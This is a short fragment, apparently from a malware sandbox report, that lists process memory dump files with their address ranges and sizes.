memory/3876-244-0x0000027DBC670000-0x0000027DBC680000-memory.dmpFilesize
64KB
-
memory/3876-242-0x0000027DBC670000-0x0000027DBC680000-memory.dmpFilesize
64KB
-
memory/4356-74-0x0000000000680000-0x000000000069A000-memory.dmpFilesize
104KB
-
memory/4356-113-0x00007FFD4EF90000-0x00007FFD4FA52000-memory.dmpFilesize
10.8MB
-
memory/4356-190-0x00007FFD4EF90000-0x00007FFD4FA52000-memory.dmpFilesize
10.8MB
-
memory/4920-206-0x00007FFD4EF90000-0x00007FFD4FA52000-memory.dmpFilesize
10.8MB
-
memory/4920-207-0x00000271F6FF0000-0x00000271F7000000-memory.dmpFilesize
64KB